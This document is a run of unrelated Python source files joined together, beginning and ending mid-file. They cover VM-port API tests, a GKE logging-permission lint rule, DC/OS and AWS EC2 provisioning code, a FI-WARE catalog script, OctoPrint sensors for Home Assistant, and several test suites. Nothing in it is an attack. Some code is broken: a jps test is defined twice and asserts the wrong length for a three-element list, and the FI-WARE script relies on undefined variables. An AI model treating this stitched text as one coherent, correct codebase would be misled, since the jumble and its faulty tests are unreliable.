                              VM_RESOURCE_ID,
                              PORT_RESOURCE_ID))

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), port_response_body)

    def test_get_ports_collection_successful(self):
        VM_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        PORT1_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000003")
        PORT2_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000004")
        PORT3_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000005")
        port1 = models.Port(uuid=PORT1_RESOURCE_ID,
                            mac="00:00:00:00:00:03",
                            vm=self.vm1)
        port1.save(session=self.session)
        port2 = models.Port(uuid=PORT2_RESOURCE_ID,
                            mac="00:00:00:00:00:04",
                            vm=self.vm1)
        port2.save(session=self.session)
        port3 = models.Port(uuid=PORT3_RESOURCE_ID,
                            mac="00:00:00:00:00:05",
                            vm=self.vm2)
        port3.save(session=self.session)
        ports_response_body = [{
            "uuid": str(PORT1_RESOURCE_ID),
            "mac": "00:00:00:00:00:03",
            "vm": parse.urlparse(
                self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                  VM_RESOURCE_ID)).path
        }, {
            "uuid": str(PORT2_RESOURCE_ID),
            "mac": "00:00:00:00:00:04",
            "vm": parse.urlparse(
                self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                  VM_RESOURCE_ID)).path
        }]
        self.session.commit()

        response = requests.get(
            self.get_endpoint(TEMPL_PORTS_COLLECTION_ENDPOINT, VM_RESOURCE_ID))

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), ports_response_body)

    def test_delete_nested_resource_successful(self):
        VM_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        PORT_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000003")
        port = models.Port(uuid=PORT_RESOURCE_ID,
                           mac="00:00:00:00:00:03",
                           vm=self.vm1)
        port.save(session=self.session)
        self.session.commit()

        response = requests.delete(
            self.get_endpoint(TEMPL_PORT_RESOURCE_ENDPOINT,
                              VM_RESOURCE_ID,
                              PORT_RESOURCE_ID))

        self.assertEqual(response.status_code, 204)
        self.assertRaises(exceptions.RecordNotFound,
                          models.Port.objects.get_one,
                          filters={'uuid': PORT_RESOURCE_ID})

# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""GKE nodes service account permissions for logging.

The service account used by GKE nodes should have the logging.logWriter
role, otherwise ingestion of logs won't work.
"""

from gcpdiag import lint, models
from gcpdiag.queries import gke, iam

ROLE = 'roles/logging.logWriter'


def prefetch_rule(context: models.Context):
  # Make sure that we have the IAM policy in cache.
  project_ids = {c.project_id for c in gke.get_clusters(context).values()}
  for pid in project_ids:
    iam.get_project_policy(pid)


def run_rule(context: models.Context, report: lint.LintReportRuleInterface):
  # Find all clusters with logging enabled.
  clusters = gke.get_clusters(context)
  iam_policy = iam.get_project_policy(context.project_id)
  if not clusters:
    report.add_skipped(None, 'no clusters found')
  for _, c in sorted(clusters.items()):
    if not c.has_logging_enabled():
      report.add_skipped(c, 'logging disabled')
    else:
      # Verify service-account permissions for every nodepool.
      for np in c.nodepools:
        sa = np.service_account
        if not iam.is_service_account_enabled(sa, context.project_id):
          report.add_failed(np, f'service account disabled or deleted: {sa}')
        elif not iam_policy.has_role_permissions(f'serviceAccount:{sa}', ROLE):
          report.add_failed(np, f'service account: {sa}\nmissing role: {ROLE}')
        else:
          report.add_ok(np)

""" Launcher functionality for the Google Compute Engine (GCE)
"""
import json
import logging
import os

from dcos_launch import onprem, util
from dcos_launch.platforms import gcp
from dcos_test_utils.helpers import Host
from googleapiclient.errors import HttpError

log = logging.getLogger(__name__)


def get_credentials(env=None) -> tuple:
    path = None
    if env is None:
        env = os.environ.copy()
    if 'GCE_CREDENTIALS' in env:
        json_credentials = env['GCE_CREDENTIALS']
    elif 'GOOGLE_APPLICATION_CREDENTIALS' in env:
        path = env['GOOGLE_APPLICATION_CREDENTIALS']
        json_credentials = util.read_file(path)
    else:
        raise util.LauncherError(
            'MissingParameter', 'Either GCE_CREDENTIALS or GOOGLE_APPLICATION_CREDENTIALS must be set in env')

    return json_credentials, path


class OnPremLauncher(onprem.AbstractOnpremLauncher):
    # Launches a homogeneous cluster of plain GMIs intended for onprem DC/OS
    def __init__(self, config: dict, env=None):
        creds_string, _ = get_credentials(env)
        self.gcp_wrapper = gcp.GcpWrapper(json.loads(creds_string))
        self.config = config

    @property
    def deployment(self):
        """ Builds a BareClusterDeployment instance with self.config, but only returns it successfully if the
        corresponding real deployment (active machines) exists and doesn't contain any errors.
        """
        try:
            deployment = gcp.BareClusterDeployment(self.gcp_wrapper, self.config['deployment_name'],
                                                   self.config['gce_zone'])
            info = deployment.get_info()
            errors = info['operation'].get('error')
            if errors:
                raise util.LauncherError('DeploymentContainsErrors', str(errors))
            return deployment
        except HttpError as e:
            if e.resp.status == 404:
                raise util.LauncherError('DeploymentNotFound',
                                         "The deployment you are trying to access doesn't exist") from e
            raise e

    def create(self) -> dict:
        self.key_helper()
        node_count = 1 + (self.config['num_masters'] + self.config['num_public_agents']
                          + self.config['num_private_agents'])
        gcp.BareClusterDeployment.create(
            self.gcp_wrapper,
            self.config['deployment_name'],
            self.config['gce_zone'],
            node_count,
            self.config['disk_size'],
            self.config['disk_type'],
            self.config['source_image'],
            self.config['machine_type'],
            self.config['image_project'],
            self.config['ssh_user'],
            self.config['ssh_public_key'],
            self.config['disable_updates'],
            self.config['use_preemptible_vms'],
            tags=self.config.get('tags'))
        return self.config

    def key_helper(self):
        """ Generates a public key and a private key and stores them in the config. The public key will be applied to
        all the instances in the deployment later on when wait() is called.
        """
        if self.config['key_helper']:
            private_key, public_key = util.generate_rsa_keypair()
            self.config['ssh_private_key'] = private_key.decode()
            self.config['ssh_public_key'] = public_key.decode()

    def get_cluster_hosts(self) -> [Host]:
        return list(self.deployment.hosts)[1:]

    def get_bootstrap_host(self) -> Host:
        return list(self.deployment.hosts)[0]

    def wait(self):
        """ Waits for the deployment to complete: first, the network that will contain the cluster is deployed. Once
        the network is deployed, a firewall for the network and an instance template are deployed. Finally,
        once the instance template is deployed, an instance group manager and all its instances are deployed.
        """
        self.deployment.wait_for_completion()

    def delete(self):
        """ Deletes all the resources associated with the deployment (instance template, network, firewall, instance
        group manager and all its instances.
        """
        self.deployment.delete()

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014 Telefonica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
#        http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with opensource@tid.es

'''
Created on 16/04/2013

@author: henar
'''
import httplib
import sys
import os
from xml.dom.minidom import parse, parseString
from xml.dom.minidom import getDOMImplementation
from xml.etree.ElementTree import Element, SubElement, tostring
import md5
import httplib, urllib
import utils



token = utils.obtainToken(keystone_ip, keystone_port, user, password, project)
print(token)

headers = {'Content-Type': 'application/xml', 'X-Auth-Token': token, 'Tenant-ID': vdc}
print(headers)

print('Get products in the software catalogue: ')
resource = "/sdc/rest/catalog/product"
data1 = utils.doRequestHttpOperation(domine, port, resource, 'GET', None, headers)

dom = parseString(data1)
try:
    product = (dom.getElementsByTagName('product'))[0]
    productname = product.firstChild.firstChild.nodeValue
    print('First product in the software catalogue: ' + productname)

except:
    print ("Error in the request to get products")
    sys.exit(1)

print('Get Product Details ' + product_name )
data1 = utils.doRequestHttpOperation(domine, port, "/sdc/rest/catalog/product/" + product_name, 'GET', None, headers)
print("  OK")

print('Get Product Releases ' + product_name )
data1 = utils.doRequestHttpOperation(domine, port, "/sdc/rest/catalog/product/" + product_name + "/release", 'GET',
    None, headers)
print("  OK")

print('Get Product Release Info ' + product_name + " " + product_version )
data1 = utils.doRequestHttpOperation(domine, port,
    "/sdc/rest/catalog/product/" + product_name + "/release/" + product_version, 'GET', None, headers)
print("  OK")

print('Get Product Attributes ' + product_name )
data1 = utils.doRequestHttpOperation(domine, port, "/sdc/rest/catalog/product/" + product_name + '/attributes', 'GET',
    None, headers)
print("  OK")

resource_product_instance = "/sdc/rest/vdc/" + vdc + "/productInstance"
print('Install a product in VM. Product ' + product_name )

productInstanceDto = utils.createProductInstanceDto(vm_ip, vm_fqn, product_name, product_version)
print (tostring(productInstanceDto))
task = utils.doRequestHttpOperation(domine, port, resource_product_instance, 'POST', tostring(productInstanceDto),
    headers)
print (task)
status = utils.processTask(domine, port, task)
print ("  " + status)

resource_get_info_product_instance = "/sdc/rest/vdc/" + vdc + "/productInstance/" + vm_fqn + '_' + product_name + '_' + product_version
print('Get Product Instance Info. Product ' + product_name )
data = utils.doRequestHttpOperation(domine, port, resource_get_info_product_instance, 'GET', None)
print(data)
status = utils.processProductInstanceStatus(data)
#if  status != 'INSTALLED':
# print("Status not correct" + status)

resource_delete_product_instance = "/sdc/rest/vdc/" + vdc + "/productInstance/" + vm_fqn + '_' + product_name + '_' + product_version
print('Get Delete Product Instance ' + product_name )
task = utils.doRequestHttpOperation(domine, port, resource_delete_product_instance, 'DELETE', None)
status = utils.processTask(domine, port, task)
print("  OK")
data = utils.doRequestHttpOperation(domine, port, resource_delete_product_instance, 'GET', None)
statusProduct = utils.processProductInstanceStatus(data)
#if  status != 'UNINSTALLED':
# print("Status not correct" + statusProduct)






    

    
    

    

    
    
 



# Copyright 2014-2015 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from touchdown import ssh
from touchdown.aws.ec2.keypair import KeyPair
from touchdown.aws.iam import InstanceProfile
from touchdown.aws.vpc import SecurityGroup, Subnet
from touchdown.core import argument, errors, serializers
from touchdown.core.plan import Plan, Present
from touchdown.core.resource import Resource

from ..account import BaseAccount
from ..common import SimpleApply, SimpleDescribe, SimpleDestroy


class BlockDevice(Resource):

    resource_name = "block_device"

    virtual_name = argument.String(field="VirtualName")
    device_name = argument.String(field="DeviceName")
    disabled = argument.Boolean(field="NoDevice", serializer=serializers.Const(""))


class NetworkInterface(Resource):

    resource_name = "network_interface"

    public = argument.Boolean(default=False, field="AssociatePublicIpAddress")
    security_groups = argument.ResourceList(SecurityGroup, field="Groups")


class Instance(Resource):

    resource_name = "ec2_instance"

    name = argument.String(min=3, max=128, field="Name", group="tags")
    ami = argument.String(field="ImageId")
    instance_type = argument.String(field="InstanceType")
    key_pair = argument.Resource(KeyPair, field="KeyName")
    subnet = argument.Resource(Subnet, field="SubnetId")
    instance_profile = argument.Resource(
        InstanceProfile,
        field="IamInstanceProfile",
        serializer=serializers.Dict(Name=serializers.Property("InstanceProfileName")),
    )

    user_data = argument.String(field="UserData")

    network_interfaces = argument.ResourceList(
        NetworkInterface, field="NetworkInterfaces"
    )

    block_devices = argument.ResourceList(
        BlockDevice,
        field="BlockDeviceMappings",
        serializer=serializers.List(serializers.Resource()),
    )

    security_groups = argument.ResourceList(SecurityGroup, field="SecurityGroupIds")

    tags = argument.Dict()

    account = argument.Resource(BaseAccount)


class Describe(SimpleDescribe, Plan):

    resource = Instance
    service_name = "ec2"
    api_version = "2015-10-01"
    describe_action = "describe_instances"
    describe_envelope = "Reservations[].Instances[]"
    key = "InstanceId"

    def get_describe_filters(self):
        return {
            "Filters": [
                {"Name": "tag:Name", "Values": [self.resource.name]},
                {
                    "Name": "instance-state-name",
                    "Values": [
                        "pending",
                        "running",
                        "shutting-down",
                        " stopping",
                        "stopped",
                    ],
                },
            ]
        }


class Apply(SimpleApply, Describe):

    create_action = "run_instances"
    create_envelope = "Instances[0]"
    # create_response = 'id-only'
    waiter = "instance_running"

    signature = (Present("name"),)

    def get_create_serializer(self):
        return serializers.Resource(MaxCount=1, MinCount=1)


class Destroy(SimpleDestroy, Describe):

    destroy_action = "terminate_instances"
    waiter = "instance_terminated"

    def get_destroy_serializer(self):
        return serializers.Dict(
            InstanceIds=serializers.ListOfOne(serializers.Property("InstanceId"))
        )


class SSHInstance(ssh.Instance):

    resource_name = "ec2_instance"
    input = Instance

    def get_network_id(self, runner):
        # FIXME: We can save on some steps if we only do this once
        obj = runner.get_plan(self.adapts).describe_object()
        return obj.get("VpcId", None)

    def get_serializer(self, runner, **kwargs):
        obj = runner.get_plan(self.adapts).describe_object()

        if getattr(self.parent, "proxy", None) and self.parent.proxy.instance:
            if hasattr(self.parent.proxy.instance, "get_network_id"):
                network = self.parent.proxy.instance.get_network_id(runner)
                if network == self.get_network_id(runner):
                    return serializers.Const(obj["PrivateIpAddress"])

        if obj.get("PublicDnsName", ""):
            return serializers.Const(obj["PublicDnsName"])

        if obj.get("PublicIpAddress", ""):
            return serializers.Const(obj["PublicIpAddress"])

        raise errors.Error("Instance {} not available".format(self.adapts))

"""Support for monitoring OctoPrint sensors."""
from __future__ import annotations

from datetime import datetime, timedelta
import logging

from pyoctoprintapi import OctoprintJobInfo, OctoprintPrinterInfo

from homeassistant.components.sensor import (
    SensorDeviceClass,
    SensorEntity,
    SensorStateClass,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import PERCENTAGE, TEMP_CELSIUS
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.update_coordinator import CoordinatorEntity

from . import OctoprintDataUpdateCoordinator
from .const import DOMAIN

_LOGGER = logging.getLogger(__name__)

JOB_PRINTING_STATES = ["Printing from SD", "Printing"]


def _is_printer_printing(printer: OctoprintPrinterInfo) -> bool:
    return (
        printer
        and printer.state
        and printer.state.flags
        and printer.state.flags.printing
    )


async def async_setup_entry(
    hass: HomeAssistant,
    config_entry: ConfigEntry,
    async_add_entities: AddEntitiesCallback,
) -> None:
    """Set up the available OctoPrint binary sensors."""
    coordinator: OctoprintDataUpdateCoordinator = hass.data[DOMAIN][
        config_entry.entry_id
    ]["coordinator"]
    device_id = config_entry.unique_id

    assert device_id is not None

    entities: list[SensorEntity] = []
    if coordinator.data["printer"]:
        printer_info = coordinator.data["printer"]
        types = ["actual", "target"]
        for tool in printer_info.temperatures:
            for temp_type in types:
                entities.append(
                    OctoPrintTemperatureSensor(
                        coordinator,
                        tool.name,
                        temp_type,
                        device_id,
                    )
                )
    else:
        _LOGGER.error("Printer appears to be offline, skipping temperature sensors")

    entities.append(OctoPrintStatusSensor(coordinator, device_id))
    entities.append(OctoPrintJobPercentageSensor(coordinator, device_id))
    entities.append(OctoPrintEstimatedFinishTimeSensor(coordinator, device_id))
    entities.append(OctoPrintStartTimeSensor(coordinator, device_id))

    async_add_entities(entities)


class OctoPrintSensorBase(CoordinatorEntity, SensorEntity):
    """Representation of an OctoPrint sensor."""

    coordinator: OctoprintDataUpdateCoordinator

    def __init__(
        self,
        coordinator: OctoprintDataUpdateCoordinator,
        sensor_type: str,
        device_id: str,
    ) -> None:
        """Initialize a new OctoPrint sensor."""
        super().__init__(coordinator)
        self._device_id = device_id
        self._attr_name = f"OctoPrint {sensor_type}"
        self._attr_unique_id = f"{sensor_type}-{device_id}"

    @property
    def device_info(self):
        """Device info."""
        return self.coordinator.device_info


class OctoPrintStatusSensor(OctoPrintSensorBase):
    """Representation of an OctoPrint sensor."""

    _attr_icon = "mdi:printer-3d"

    def __init__(
        self, coordinator: OctoprintDataUpdateCoordinator, device_id: str
    ) -> None:
        """Initialize a new OctoPrint sensor."""
        super().__init__(coordinator, "Current State", device_id)

    @property
    def native_value(self):
        """Return sensor state."""
        printer: OctoprintPrinterInfo = self.coordinator.data["printer"]
        if not printer:
            return None

        return printer.state.text

    @property
    def available(self) -> bool:
        """Return if entity is available."""
        return self.coordinator.last_update_success and self.coordinator.data["printer"]


class OctoPrintJobPercentageSensor(OctoPrintSensorBase):
    """Representation of an OctoPrint sensor."""

    _attr_native_unit_of_measurement = PERCENTAGE
    _attr_icon = "mdi:file-percent"

    def __init__(
        self, coordinator: OctoprintDataUpdateCoordinator, device_id: str
    ) -> None:
        """Initialize a new OctoPrint sensor."""
        super().__init__(coordinator, "Job Percentage", device_id)

    @property
    def native_value(self):
        """Return sensor state."""
        job: OctoprintJobInfo = self.coordinator.data["job"]
        if not job:
            return None

        if not (state := job.progress.completion):
            return 0

        return round(state, 2)


class OctoPrintEstimatedFinishTimeSensor(OctoPrintSensorBase):
    """Representation of an OctoPrint sensor."""

    _attr_device_class = SensorDeviceClass.TIMESTAMP

    def __init__(
        self, coordinator: OctoprintDataUpdateCoordinator, device_id: str
    ) -> None:
        """Initialize a new OctoPrint sensor."""
        super().__init__(coordinator, "Estimated Finish Time", device_id)

    @property
    def native_value(self) -> datetime | None:
        """Return sensor state."""
        job: OctoprintJobInfo = self.coordinator.data["job"]
        if (
            not job
            or not job.progress.print_time_left
            or not _is_printer_printing(self.coordinator.data["printer"])
        ):
            return None

        read_time = self.coordinator.data["last_read_time"]

        return read_time + timedelta(seconds=job.progress.print_time_left)


class OctoPrintStartTimeSensor(OctoPrintSensorBase):
    """Representation of an OctoPrint sensor."""

    _attr_device_class = SensorDeviceClass.TIMESTAMP

    def __init__(
        self, coordinator: OctoprintDataUpdateCoordinator, device_id: str
    ) -> None:
        """Initialize a new OctoPrint sensor."""
        super().__init__(coordinator, "Start Time", device_id)

    @property
    def native_value(self) -> datetime | None:
        """Return sensor state."""
        job: OctoprintJobInfo = self.coordinator.data["job"]

        if (
            not job
            or not job.progress.print_time
            or not _is_printer_printing(self.coordinator.data["printer"])
        ):
            return None

        read_time = self.coordinator.data["last_read_time"]

        return read_time - timedelta(seconds=job.progress.print_time)


class OctoPrintTemperatureSensor(OctoPrintSensorBase):
    """Representation of an OctoPrint sensor."""

    _attr_native_unit_of_measurement = TEMP_CELSIUS
    _attr_device_class = SensorDeviceClass.TEMPERATURE
    _attr_state_class = SensorStateClass.MEASUREMENT

    def __init__(
        self,
        coordinator: OctoprintDataUpdateCoordinator,
        tool: str,
        temp_type: str,
        device_id: str,
    ) -> None:
        """Initialize a new OctoPrint sensor."""
        super().__init__(coordinator, f"{temp_type} {tool} temp", device_id)
        self._temp_type = temp_type
        self._api_tool = tool

    @property
    def native_value(self):
        """Return sensor state."""
        printer: OctoprintPrinterInfo = self.coordinator.data["printer"]
        if not printer:
            return None

        for temp in printer.temperatures:
            if temp.name == self._api_tool:
                val = (
                    temp.actual_temp
                    if self._temp_type == "actual"
                    else temp.target_temp
                )
                if val is None:
                    return None

                return round(val, 2)

        return None

    @property
    def available(self) -> bool:
        """Return if entity is available."""
        return self.coordinator.last_update_success and self.coordinator.data["printer"]

import jps
import json
import time


class MessageHolder(object):

    def __init__(self):
        self._saved_msg = []

    def __call__(self, msg):
        self._saved_msg.append(msg)

    def get_msg(self):
        return self._saved_msg


def test_multi_pubsub_once():
    holder1 = MessageHolder()
    holder2 = MessageHolder()
    holder3 = MessageHolder()
    sub1 = jps.Subscriber('test_utils1', holder1)
    sub2 = jps.Subscriber('test_utils2', holder2)
    sub3 = jps.Subscriber('test_utils3', holder3)
    pub = jps.utils.JsonMultiplePublisher()
    time.sleep(0.1)
    pub.publish(
        '{"test_utils1": "hoge", "test_utils2": {"x": 3}, "test_utils3": 5}')
    time.sleep(0.1)
    sub1.spin_once()
    sub2.spin_once()
    sub3.spin_once()
    assert len(holder1.get_msg()) == 1
    assert json.loads(holder1.get_msg()[0]) == 'hoge'
    assert len(holder2.get_msg()) == 1
    obj = json.loads(holder2.get_msg()[0])
    assert obj['x'] == 3
    assert len(holder3.get_msg()) == 1
    assert json.loads(holder3.get_msg()[0]) == 5


def test_to_obj():
    msg = '{"aa": 1, "bb": ["hoge", "hogi"], "cc": {"cc1" : 50}}'
    converted = jps.utils.to_obj(msg)
    assert converted.aa == 1
    assert converted.bb[0] == 'hoge'
    assert converted.bb[1] == 'hogi'
    assert len(converted.bb) == 2
    assert converted.cc.cc1 == 50
    # todo: do
    #   json = converted.to_json()
    #   assert json == msg

# todo


def test_to_obj_list():
    msg = '["hoge", "hogi", {"atr1": "val2", "atr2": 1.0}]'
    bb = jps.utils.to_obj(msg)
    assert len(bb) == 2
    assert bb[0] == 'hoge'
    assert bb[1] == 'hogi'
    assert bb[2].atr1 == 'val2'
    assert bb[2].atr2 == 1.0
#    json = bb.to_json()
#    assert json == msg


def test_to_obj_list():
    msg = '[{"hoge": 1}, {"hogi": 2}]'
    bb = jps.utils.to_obj(msg)
    assert len(bb) == 2
    assert bb[0].hoge == 1
    assert bb[1].hogi == 2
#  todo: list support
#    json = bb.to_json()
#    assert json == msg


def test_to_obj_simple():
    msg = '{"aa": 1, "cc": 3, "bb": 2}'
    converted = jps.utils.to_obj(msg)
    assert converted.aa == 1
    assert converted.bb == 2
    assert converted.cc == 3
    # works only super simple case
    json1 = converted.to_json()
    assert json1 == msg

# -*- coding:utf-8 -*-


"""
 Verion: 1.0
 Author: zhangjian
 Site: http://iliangqunru.com
 File: __init__.py.py
 Time: 2017/7/22 2:19
"""

import codecs
import mock
import os
import tempfile
import unittest
from time import strftime

import six

from kinto import config
from kinto import __version__


class ConfigTest(unittest.TestCase):
    def test_transpose_parameters_into_template(self):
        self.maxDiff = None
        template = "kinto.tpl"
        dest = tempfile.mktemp()
        config.render_template(template, dest,
                               secret='secret',
                               storage_backend='storage_backend',
                               cache_backend='cache_backend',
                               permission_backend='permission_backend',
                               storage_url='storage_url',
                               cache_url='cache_url',
                               permission_url='permission_url',
                               kinto_version='kinto_version',
                               config_file_timestamp='config_file_timestamp')

        with codecs.open(dest, 'r', encoding='utf-8') as d:
            destination_temp = d.read()

        sample_path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
                                   "test_configuration/test.ini")
        with codecs.open(sample_path, 'r', encoding='utf-8') as c:
            sample = c.read()

        self.assertEqual(destination_temp, sample)

    def test_create_destination_directory(self):
        dest = os.path.join(tempfile.mkdtemp(), 'config', 'kinto.ini')

        config.render_template("kinto.tpl", dest,
                               secret='secret',
                               storage_backend='storage_backend',
                               cache_backend='cache_backend',
                               permission_backend='permission_backend',
                               storage_url='storage_url',
                               cache_url='cache_url',
                               permission_url='permission_url',
                               kinto_version='kinto_version',
                               config_file_timestamp='config_file_timestamp')

        self.assertTrue(os.path.exists(dest))

    @mock.patch('kinto.config.render_template')
    def test_hmac_secret_is_text(self, mocked_render_template):
        config.init('kinto.ini', 'postgresql')
        args, kwargs = list(mocked_render_template.call_args)
        self.assertEquals(type(kwargs['secret']), six.text_type)

    @mock.patch('kinto.config.render_template')
    def test_init_postgresql_values(self, mocked_render_template):
        config.init('kinto.ini', 'postgresql')

        args, kwargs = list(mocked_render_template.call_args)
        self.assertEquals(args, ('kinto.tpl', 'kinto.ini'))

        postgresql_url = "postgres://postgres:postgres@localhost/postgres"
        self.assertDictEqual(kwargs, {
            'secret': kwargs['secret'],
            'storage_backend': 'kinto.core.storage.postgresql',
            'cache_backend': 'kinto.core.cache.postgresql',
            'permission_backend': 'kinto.core.permission.postgresql',
            'storage_url': postgresql_url,
            'cache_url':  postgresql_url,
            'permission_url': postgresql_url,
            'kinto_version': __version__,
            'config_file_timestamp': strftime('%a, %d %b %Y %H:%M:%S %z')
        })

    @mock.patch('kinto.config.render_template')
    def test_init_redis_values(self, mocked_render_template):
        config.init('kinto.ini', 'redis')

        args, kwargs = list(mocked_render_template.call_args)
        self.assertEquals(args, ('kinto.tpl', 'kinto.ini'))

        redis_url = "redis://localhost:6379"

        self.maxDiff = None  # See the full diff in case of error
        self.assertDictEqual(kwargs, {
            'secret': kwargs['secret'],
            'storage_backend': 'kinto_redis.storage',
            'cache_backend': 'kinto_redis.cache',
            'permission_backend': 'kinto_redis.permission',
            'storage_url': redis_url + '/1',
            'cache_url':  redis_url + '/2',
            'permission_url': redis_url + '/3',
            'kinto_version': __version__,
            'config_file_timestamp': strftime('%a, %d %b %Y %H:%M:%S %z')
        })

    @mock.patch('kinto.config.render_template')
    def test_init_memory_values(self, mocked_render_template):
        config.init('kinto.ini', 'memory')

        args, kwargs = list(mocked_render_template.call_args)
        self.assertEquals(args, ('kinto.tpl', 'kinto.ini'))

        self.assertDictEqual(kwargs, {
            'secret': kwargs['secret'],
            'storage_backend': 'kinto.core.storage.memory',
            'cache_backend': 'kinto.core.cache.memory',
            'permission_backend': 'kinto.core.permission.memory',
            'storage_url': '',
            'cache_url':  '',
            'permission_url': '',
            'kinto_version': __version__,
            'config_file_timestamp': strftime('%a, %d %b %Y %H:%M:%S %z')
        })

    def test_render_template_creates_directory_if_necessary(self):
        temp_path = tempfile.mkdtemp()
        destination = os.path.join(temp_path, 'config/kinto.ini')
        config.render_template('kinto.tpl', destination, **{
            'secret': "abcd-ceci-est-un-secret",
            'storage_backend': 'kinto.core.storage.memory',
            'cache_backend': 'kinto.core.cache.memory',
            'permission_backend': 'kinto.core.permission.memory',
            'storage_url': '',
            'cache_url':  '',
            'permission_url': '',
            'kinto_version': '',
            'config_file_timestamp': ''
        })
        self.assertTrue(os.path.exists(destination))

    def test_render_template_works_with_file_in_cwd(self):
        temp_path = tempfile.mkdtemp()
        os.chdir(temp_path)
        config.render_template('kinto.tpl', 'kinto.ini', **{
            'secret': "abcd-ceci-est-un-secret",
            'storage_backend': 'kinto.core.storage.memory',
            'cache_backend': 'kinto.core.cache.memory',
            'permission_backend': 'kinto.core.permission.memory',
            'storage_url': '',
            'cache_url':  '',
            'permission_url': '',
            'kinto_version': '',
            'config_file_timestamp': ''
        })
        self.assertTrue(os.path.exists(
            os.path.join(temp_path, 'kinto.ini')
        ))

class Solution(object):
    def containsNearbyAlmostDuplicate(self, nums, k, t):
        """
        :type nums: List[int]
        :type k: int
        :type t: int
        :rtype: bool
        """
        if k < 1 or t < 0:
            return False
        dic = {}
        t += 1
        for i in range(len(nums)):
            if i > k:
                del dic[nums[i - k - 1] // t]
            m = nums[i] // t
            if m in dic:
                return True
            if m - 1 in dic and abs(nums[i] - dic[m - 1]) < t:
                return True
            if m + 1 in dic and abs(nums[i] - dic[m + 1]) < t:
                return True
            dic[m] = nums[i]
        return False

test = Solution()
print(test.containsNearbyAlmostDuplicate([1, 3, 1], 1, 1))

import boto3
import pytest
import sure  # noqa # pylint: disable=unused-import

from botocore.exceptions import ClientError
from moto import mock_dynamodb2


@mock_dynamodb2
def test_error_on_wrong_value_for_consumed_capacity():
    resource = boto3.resource("dynamodb", region_name="ap-northeast-3")
    client = boto3.client("dynamodb", region_name="ap-northeast-3")
    client.create_table(
        TableName="jobs",
        KeySchema=[{"AttributeName": "job_id", "KeyType": "HASH"}],
        AttributeDefinitions=[{"AttributeName": "job_id", "AttributeType": "S"}],
        ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    )

    table = resource.Table("jobs")
    item = {"job_id": "asdasdasd", "expires_at": "1"}

    # PUT_ITEM
    with pytest.raises(ClientError) as ex:
        table.put_item(Item=item, ReturnConsumedCapacity="Garbage")
    err = ex.value.response["Error"]
    err["Code"].should.equal("ValidationException")
    err["Message"].should.equal(
        "1 validation error detected: Value 'Garbage' at 'returnConsumedCapacity' failed to satisfy constraint: Member must satisfy enum value set: [INDEXES, TOTAL, NONE]"
    )


@mock_dynamodb2
def test_consumed_capacity_get_unknown_item():
    conn = boto3.client("dynamodb", region_name="us-east-1")
    conn.create_table(
        TableName="test_table",
        KeySchema=[{"AttributeName": "u", "KeyType": "HASH"}],
        AttributeDefinitions=[{"AttributeName": "u", "AttributeType": "S"}],
        BillingMode="PAY_PER_REQUEST",
    )
    response = conn.get_item(
        TableName="test_table",
        Key={"u": {"S": "does_not_exist"}},
        ReturnConsumedCapacity="TOTAL",
    )

    # Should still return ConsumedCapacity, even if it does not return an item
    response.should.have.key("ConsumedCapacity")
    response["ConsumedCapacity"].should.equal(
        {"TableName": "test_table", "CapacityUnits": 0.5}
    )


@mock_dynamodb2
@pytest.mark.parametrize(
    "capacity,should_have_capacity,should_have_table",
    [
        [None, False, False],
        ["NONE", False, False],
        ["TOTAL", True, False],
        ["INDEXES", True, True],
    ],
)
def test_only_return_consumed_capacity_when_required(
    capacity, should_have_capacity, should_have_table
):
    resource = boto3.resource("dynamodb", region_name="ap-northeast-3")
    client = boto3.client("dynamodb", region_name="ap-northeast-3")
    client.create_table(
        TableName="jobs",
        KeySchema=[{"AttributeName": "job_id", "KeyType": "HASH"}],
        LocalSecondaryIndexes=[
            {
                "IndexName": "job_name-index",
                "KeySchema": [{"AttributeName": "job_name", "KeyType": "HASH"}],
                "Projection": {"ProjectionType": "ALL"},
            }
        ],
        AttributeDefinitions=[
            {"AttributeName": "job_id", "AttributeType": "S"},
            {"AttributeName": "job_name", "AttributeType": "S"},
        ],
        ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    )

    table = resource.Table("jobs")
    item = {"job_id": "asdasdasd", "expires_at": "1"}

